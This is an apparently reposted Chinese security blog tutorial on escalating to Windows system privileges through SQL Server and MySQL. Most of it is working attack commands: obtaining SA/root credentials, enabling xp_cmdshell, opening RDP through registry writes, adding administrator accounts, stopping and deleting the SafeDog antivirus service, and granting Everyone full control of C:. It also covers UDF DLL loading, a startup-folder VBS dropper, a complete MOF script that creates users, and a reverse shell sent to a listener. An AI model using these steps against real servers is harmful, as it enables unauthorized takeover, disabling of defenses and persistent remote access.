Windows系统提权之数据库提权

  • A+
所属分类:安全文章

在利用系统溢出漏洞无果的情况下,可以尝试采用数据库进行提权。数据库提权的前提条件:拥有数据库最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能,本文主要针对SQL server,MySQL数据库提权进行记录。

SQL server,MySQL都需要具备数据库管理员权限才可执行提权操作。linux系统下mysql root用户是服务用户,权限不足以提权。Windows下mysql root权限很高,在没有被降权的情况可以进行提权操作。但是zkeys、宝塔等集成环境默认降权了root账号


SQL server 数据库提权

提权流程:获取SA账号>远程数据库登录>安装提权组件>创建账号>开启3389>远程系统登录>完成


一、SA账号的获取
1.爆破获取账号密码
2.网站源码,查看数据库连接文件。如web.config、config.asp、conn.asp、dbconfig.asp。可能得到的账号名称不是sa,但是具有系统权限。使用数据库软件连接数据库执行系统数据库的操作,若可以操作说明此账号具有sa权限。或者利用注入sqlmap --is-dba确认是否为dba权限。SQL server默认允许sa外链登陆,mysql root用户默认不允许外链登陆。

二、提权

2.1允许外联

xp_cmdshell组件默认在mssql 2000中是开启的,在mssql 2005之后的版本中则默认禁止。拥有管理员sa权限则可以用sp_configure开启该组件。
1.使用已经得到的sa权限账号远程登录数据库
2.启用cmd_shell执行命令组件:

EXEC sp_configure 'show advanced options', 1GORECONFIGUREGOEXEC sp_configure 'xp_cmdshell', 1GORECONFIGUREGO
Windows系统提权之数据库提权
3.组件启用成功,可执行系统命令。在此基础上进行系统账号创建操作:
Windows系统提权之数据库提权
4.如果目标机器没有开启3389,使用以下命令开启3389
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;--
5.其他
#停用cmd_shell执行命令组件EXEC sp_configure 'show advanced options', 1RECONFIGUREEXEC sp_configure 'xp_cmdshell', 0RECONFIGURE
#执行系统命令EXEC master.dbo.xp_cmdshell 'ipconfig'#关闭3389exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',1;#如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复exec master.sys.sp_addextendedproc 'xp_cmdshell''C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll'

2.2禁止外链
如果目标数据库没有开外链,我们无法从远程登录数据。则需要利用一些大马进行提权

1.拿到账号密码,在大马上登录数据库
Windows系统提权之数据库提权2.开启cmd_shell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; #该语句适用于sql server 2005

Windows系统提权之数据库提权

3.命令执行

Windows系统提权之数据库提权

4.开启3389,远程登录


2.3 过杀软

以安全狗为例,利用cmd_shell提权时安全狗不拦截创建账号操作,但是会拦截添加到管理员组的操作。可以将创建的用户添加到远程桌面组(remote desktop users),但是登陆进去了是普通用户,权限很低。这时可以对文件进行降权,降权之后可对系统盘进行操作:
1.降权
#将C盘设置为完全控制cacls c:/e /t /g everyone:F

Windows系统提权之数据库提权

2.杀狗

#system权限停用安全狗服务:net stop "safedog guard center" /ynet stop "safedog update center" /ynet stop "safedogguardcenter" /y
#system权限删除安全狗服务:sc stop "SafeDogGuardCenter"sc config "SafeDogGuardCenter" start=disabledsc delete "Safedogguardcenter"
sc stop "SafeDogupdateCenter"sc config "SafeDogUpdateCenter" start=disabledsc delete "SafedogUpdatecenter"
sc stop "SafeDogCloudHeler"sc config "SafeDogCloudHeler" start=disabledsc delete "SafeDogCloudHeler"#重启服务器即可kill安全狗。

3.其他

https://github.com/keyixiaxiang/xiaxiang-killer

Windows系统提权之数据库提权


MySQL数据库提权

Windows系统提权之数据库提权


一、获取root账号

1.1查看网站源码里面数据库配置文件(关键词:conn.php,config.php,dbconfig.php,config.inc.php,common.inc.php,inc,conn,config.sql,common,data,sql,data,inc,config,conn,database,common,include)
一般来说云主机上面的网站配置文件一般数据库连接文件都是低权限账号,是根据不用站点创建不同数据库用户。单个服务器上的网站属于一个机构,这种情况可能拿下数据库配置文件直接是root账号。另外我们得到的账号不是root也有可能是root权限,能过获取mysql数据库信息一般是root权限。

1.2查看数据库安装路径(select @@basedir)下的 (/mysql/data/mysql/user.myd)下载,本地打开。
情形一,可以直接读取账号密码:
Windows系统提权之数据库提权
情形二,得到的密文是不完整的或者管理员设置了其他密码不能登陆进去。下载user.myd,user.frm,user.myi三个数据库文件。替换到本地mysql数据库,注意mysql版本和目标保持版本一致确保兼容。替换完成后本地登陆mysql
mysqld --skip-grant-tables# 跳过验证mysql.exe -uroot    # 进入MySQL
Windows系统提权之数据库提权
1.3暴力破解(默认不能通过外部地址爆破,利用脚本在服务器进行本地破解)
①使用大马进行内部地址爆破:
Windows系统提权之数据库提权
②也可以上传数据库登录脚本,burp抓包爆破root账号密码
Windows系统提权之数据库提权
③https://www.jb51.net/article/94867.htm
Windows系统提权之数据库提权


二、MySQL开外链

修改user表host字段为%,表示允许任意地址登录MySQL,开启外链接成功

Grant all privileges on *.* to 'root'@'%' identified by 'password' with grant option;

开外联前
Windows系统提权之数据库提权

开外联后

Windows系统提权之数据库提权


三、UDF提权

3.1 UDF提权原理udf(Userdefined function)是用户自定义函数简写。通过root权限将文件udf.dll导出到系统目录下,可以通过udf.dll创建执行系统命令的函数来调用执行cmd。现在基本上windows的服务器是以下两个路径导出UDF.DLL
win 2000: C:Winntudf.dll    win 2003: C:Windowsudf.dll 
在MySQL高版本中secure-file-priv参数限制了MySQL的导出;
① NULL,表示禁止
② 如果value值有文件夹目录,则表示只允许该目录下文件(子目录都不行)
③ 如果为空(没有值),则表示不限制目录
MySQL5.0/5.6版本:my.ini中无此参数,查询该参数情况为空,不限制目录:
MySQL5.7版本:my.ini中存在参数,查询该参数情况为NULL,不允许导出:
Windows系统提权之数据库提权

3.2.提权

 创建plugin目录:

MySQL 5.1 以上版本需要导出到mysql安装目录/lib/plugin/,5.1 以下直接安装在c:/windows目录下,如果5.1以上没有plugin目录,需要手工创建或者通过NTFS流创建目录:

#NTFS流创建plugin目录select 'x' into dumpfile 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin::INDEX_ALLOCATION';
Windows系统提权之数据库提权
查看plugin目录:select @@plugin_dir;
Windows系统提权之数据库提权

②导出udf,如果脚本没法导出udf文件,也可以手动将该文件复制到plugin文件夹下(创建plugin目录、复制粘贴udf文件都需要一定的权限)
Windows系统提权之数据库提权
手工导入udf文件:
select load_file('d:\wwwrooot\network\lib_mysqludf_sys_64.dll') into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
③创建shell函数,创建完成后即可执行命令,也可以手动创建函数。
#安装create function cmdshell returns string soname 'udf.dll'#写入命令select cmdshell('net user test 123.com /add');  select cmdshell('net localgroup administrators test /add');  drop function cmdshell; # 删除函数
当然使用udf马自带的功能更省事一点:
Windows系统提权之数据库提权

④提权成功,可以执行命令
select sys_eval('whoami')
Windows系统提权之数据库提权

如果目标mysql版本小于5.1。在这里导出即可
Windows系统提权之数据库提权

四、启动项提权

#启动项目录:win 08:C:ProgramDataMicrosoftWindowsStart MenuProgramsStartupwin 03:C:Documents and SettingsAdministrator「开始」菜单程序启动

4.1 创建test数据库

create database test;

4.2 在TEST数据库下创建一个新的表;

create table a (cmd text);#创建了一个表名为a的表,表中只存放一个字段,字段名为cmd,text文本
4.3 在表中插入内容
insert into a values ("set wshshell=createobject (""wscript.shell"")");insert into a values ("a=wshshell.run (""cmd.exe /c net user test123 123456 /add"",0)");insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test123 /add"",0)");# 调用cmd创建管理员,注意双引号和括号以及后面的"0"一定要输入,用这三条命令来建立一个VBS的脚本程序select * from a;


4.4 将表输出为一个VBS的脚本文件

select * from a into outfile "C://ProgramData//Administrator//Windows//Start Menu//Programs//Startup//a.vbs";
Windows系统提权之数据库提权

4.5重启计算机,创建用户成功。实际情况可以利用服务器漏洞,如ms12-020
Windows系统提权之数据库提权

4.6 二次执行进行提权
这里test123用户不是administrators组用户,使用相同的办法通过mysql命令重新写入vbs脚本。脚本内容为:
insert into a values ("set wshshell=createobject (""wscript.shell"")");insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test123 /add"",0)");
然后加入启动项,再次重启计算机,此命令被执行,完成提权:
Windows系统提权之数据库提权


五、mof 提权

MOF是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。拥有mysql的root权限了以后,然后使用root权限去执行上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,里面包含cmd的添加管理员用户的命令。

# 提权mof脚本#pragma namespace("\\.\root\subscription")#pragma namespace("\\.\root\subscription") instance of __EventFilter as $EventFilter {     EventNamespace = "Root\Cimv2";     Name  = "filtP2";     Query = "Select * From __InstanceModificationEvent "             "Where TargetInstance Isa "Win32_LocalTime" "             "And TargetInstance.Second = 5";     QueryLanguage = "WQL"; };instance of ActiveScriptEventConsumer as $Consumer {     Name = "consPCSV2";     ScriptingEngine = "JScript";     ScriptText =     "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user admin admin /add")"; }; instance of __FilterToConsumerBinding {     Consumer   = $Consumer;     Filter = $EventFilter; };


5.1上传文件 1.mof,使用sql语句导出到nullevt.mof文件中
select load_file('C:/Inetpub/wwwroot/8099/uploads/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
Windows系统提权之数据库提权

5.2隔一段时间服务器会自动执行此mof文件,文件代码内容是创建admin/admin用户
Windows系统提权之数据库提权

5.3 用户创建成功。此时的admin用户只是普通用户权限
Windows系统提权之数据库提权

5.4 提升权限
把上面的命令再执行一遍,mof 文件脚本内容为添加admin用户为管理员。等待一段时间后再看admin用户,已经成功升级为管理员用户
Windows系统提权之数据库提权
Windows系统提权之数据库提权

六、反连端口提权

反链端口提权也是利用的UDF提权。只是直接udf提权遇到waf的话会被拦截禁止执行系统函数。使用端口转发过掉防护


6.1 在kali上开启监听的端口
nc -l -p 12345

6.2 登陆,创建plugin目录,导出udf
Windows系统提权之数据库提权

6.3 创建反弹函数
Windows系统提权之数据库提权

6.4.执行反弹
select backshell('192.168.1.5',12345)# 192.168.1.5为kali的IP,12345是要反弹的端口
Windows系统提权之数据库提权

6.5 成功反弹shell,完成提权
Windows系统提权之数据库提权


Windows系统提权之数据库提权


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持Windows系统提权之数据库提权

“如侵权请私聊公众号删文”



扫描关注LemonSec

Windows系统提权之数据库提权

觉得不错点个“赞”、“在看”哦Windows系统提权之数据库提权

本文始发于微信公众号(LemonSec):Windows系统提权之数据库提权

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: